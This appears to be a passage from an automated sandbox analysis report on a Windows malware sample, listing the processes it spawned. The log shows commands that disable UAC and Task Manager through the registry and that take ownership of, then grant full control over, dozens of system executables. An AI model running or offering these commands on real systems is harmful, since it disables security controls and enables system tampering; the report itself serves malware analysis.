PID 2084 wrote to memory of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 1104 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1104 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1104 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 3048 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 3048 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 3048 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2508 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2508 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2508 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2300 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2300 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2300 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 1536 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1536 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1536 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2924 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2924 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2924 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2176 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2668 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2736 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2736 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2736 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2720 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2720 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2720 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe

"C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\bfsvc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\HelpPane.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\hh.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\splwow64.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\winhlp32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\write.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\raserver.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\msra.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\logagent.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\runas.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\stordiag.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S JSMURNPT /U Admin /F "C:\Windows\System32\stordiag.exe"

C:\Windows\System32\icacls.exe

